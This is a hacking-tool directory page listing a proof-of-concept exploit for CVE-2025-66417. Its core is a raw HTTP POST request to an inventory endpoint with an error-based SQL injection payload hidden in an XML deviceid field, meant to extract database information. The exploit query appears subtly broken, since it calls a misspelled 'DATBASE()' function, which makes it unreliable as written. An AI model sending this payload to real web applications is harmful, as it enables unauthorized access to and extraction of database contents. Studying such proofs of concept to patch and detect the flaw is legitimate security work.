Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-66417-POC — Proof-of-concept exploit for CVE-2025-66417 demonstrating SQL injection via XML POST request to extract database information from a web application inventory endpoint. | Kitploit
Tools/GitHubGitHub/lem0naids/cve-2025-66417-poc
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHublem0naids/cve-2025-66417-poc

CVE-2025-66417-POC

Proof-of-concept exploit for CVE-2025-66417 demonstrating SQL injection via XML POST request to extract database information from a web application inventory endpoint.

View Repository
437 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-66417

POC CVE-2025-66417

root@kitploit:~
POST /front/inventory.php HTTP/1.1
Host: <>
Accept-Encoding: gzip, deflate, br
Accept: text/html
Connection: keep-alive
Content-Type: text/xml
Content-Length: 429

<?xml version="1.0" encoding="UTF-8"?>
<xml>
  <QUERY>get_params</QUERY>
  <deviceid><![CDATA[' AND EXTRACTVALUE(
  1,
  CONCAT(
    0x7e,
    IFNULL(
    (SELECT DATBASE()),
      'NONE'
    ),
    0x7e
  )
)-- -]]></deviceid>
  <content></content>
</xml>
Download Tool